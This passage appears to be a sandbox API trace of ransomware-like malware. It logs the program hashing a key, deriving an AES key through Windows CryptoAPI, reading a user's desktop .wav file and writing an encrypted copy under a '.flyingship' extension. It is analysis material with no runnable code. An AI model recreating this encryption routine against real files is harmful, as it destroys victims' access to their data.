HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.673] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.673] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x575d47f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 0x6b8b38 [0075.673] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.673] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.674] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.674] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.675] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.675] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.675] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.675] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.675] CryptHashData (hHash=0x6b89f8, pbData=0x6f9728, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.675] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.677] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8af8) returned 1 [0075.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.677] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0075.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1sxwh1rq8k oa-gv-.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.678] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.678] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.678] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0f38 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0f38 | out: hHeap=0x650000) returned 1 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.678] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.678] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0075.678] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.678] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5f8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698698 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.679] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.679] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.680] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.680] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0075.680] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.680] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.680] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0075.680] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0075.680] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.680] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1sxwh1rq8k oa-gv-.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.681] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0f38 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0f38 | out: hHeap=0x650000) returned 1 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.681] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.681] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.682] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0075.682] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0075.682] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.682] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.682] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100000) returned 0x32b0020 [0075.682] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.683] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x10000, lpOverlapped=0x0) returned 1 [0075.685] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x2245, lpOverlapped=0x0) returned 1 [0075.685] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.685] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.685] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12245) returned 0x795ff8 [0075.686] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x32b0020 | out: hHeap=0x650000) returned 1 [0075.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.687] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0075.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0075.687] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12245) returned 0x7a8248 [0075.688] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.688] 